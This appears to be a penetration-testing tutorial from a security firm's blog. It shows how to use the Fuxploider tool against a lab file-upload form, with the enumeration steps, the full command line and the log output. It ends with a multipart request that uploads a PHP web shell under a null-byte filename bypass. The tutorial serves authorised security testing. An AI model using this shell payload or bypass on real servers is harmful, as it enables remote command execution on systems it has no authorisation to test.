Introduction
Identifying vulnerabilities in file upload functionality is often a tedious and time-consuming task, and many potential issues may be overlooked without automation. Fortunately Fuxploider (available at https://github.com/almandin/fuxploider.git) significantly streamlines this process.
Fuxploider is an open-source penetration testing tool designed to automate the detection and exploitation of flaws in file upload forms. It identifies the allowed file types and determines the most effective technique for uploading web shells or other malicious files to the target web server.
Installation
We can install Fluxploider on our Kali test machine as follows:
git clone https://github.com/almandin/fuxploider.git
cd fuxploider
sudo apt install python3-coloredlogs
Manual enumeration
Next, we’ll need to perform some manual enumeration of our target host to discover the following:
- Any cookies that may be needed included in our requests (e.g. session cookies in the event authentication is required for access to upload functionality)
- An error message shown when a file upload fails (for our not-regex parameter)
- A success message shown when an upload succeeds (to ensure our not-regex parameter for an upload error sufficiently differs from a successful upload)
- Any additional POST request parameters such as csrf tokens
- The form ‘action’ and file ’name’ details for our upload form
We’ll be performing manual enumeration with our browser’s Web Developer Tools.
Discovery of session cookies
Open your browser’s Web Developer Tools (CTRL+SHIFT+I) then log into your target web-application and click on the “Storage” tab to view the session cookie value as shown below (i.e. lQzyZhww0CqeKZq81wjBCVpcnvnoVx1m):
File upload error message
Navigate to the target upload area of the website and attempt to upload a restricted file to observe the error message (e.g. “Sorry, only JPG & PNG files are allowed Sorry, there was an error uploading your file.”):
Which gives us a not-regex text match of:
Sorry, only JPG
File upload success message
Now upload a valid image file and observe the success message (e.g. “The file avatars/image.png has been uploaded.”):
Additional POST form parameters
Additional parameters can be discovered by attempting a file upload then viewing the “Network -> Request” tab in developer tools and clicking the upload POST request (also note, a failed upload gives us a 403):
These values are:
user=wiener
csrf=9MYCOLRwVnMtzy2edrpX1u7ctBjdt958
Form ‘action’ and file ’name’
We can vew the ‘action’ and file ’name’ parameters for the upload form (including the previous parameters) by viewing the source for the webpage (CTRL+U):
Which give us:
action="/my-account/avatar"
name=avatar
Upload testing
We now have everything we need to run Fuxploider.
Based on the information enumerated above, we can construct the following command:
python3 fuxploider.py --cookies "session=lQzyZhww0CqeKZq81wjBCVpcnvnoVx1m" -u "https://TARGETDOMAIN/my-account" -d "user=wiener&csrf=9MYCOLRwVnMtzy2edrpX1u7ctBjdt958" --not-regex "Sorry, only JPG" -m --input-name avatar --form-action "/my-account/avatar" -T 1 -U "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" -s -l "jpg,png" -v 2>&1 | tee results.txt
Our results are output to screen and saved to a results.txt file. Also, since we’ve included the verbose flag we’ll be able to see the host respond with 403 (for failed attempts) and 200 (for success). We can grep our results file to view testable upload parameters as follows:
grep -B 2 " 200 " results.txt
2025-04-02 10:36:14 DEBUG - Sending file tmp13e58o3p.php%00.jpg with mime type: image/jpeg
2025-04-02 10:36:14 DEBUG - Resetting dropped connection:
2025-04-02 10:36:16 DEBUG - "POST /my-account/avatar HTTP/1.1" 200 136
This indicates that we can potentially upload a PHP file with null bytes (%00) after the .php extension and before an accepted .jpg extension to bypass upload restrictions.
We can test this manually in developer tools (or an intercepting proxy such as ZAP which may be more ideal if issues are encountered) as follows (Network -> Headers -> Resend):
-----------------------------239164623424479637602836869776
Content-Disposition: form-data; name="avatar"; filename="shell.php%00.jpg"
Content-Type: application/x-php
<?php echo system($_GET['command']); ?>
-----------------------------239164623424479637602836869776
Content-Disposition: form-data; name="user"
wiener
-----------------------------239164623424479637602836869776
Content-Disposition: form-data; name="csrf"
9MYCOLRwVnMtzy2edrpX1u7ctBjdt958
-----------------------------239164623424479637602836869776--
Which is successful, as the application responds with:
Meaning we can now test our webshell by executing operating system commands:
Conclusion
This concludes the basic use of Fuxploider.
Feel free to contact us if you have any questions or would like to schedule a meeting to discuss anything further, including having your web-applications or upload functionality security tested.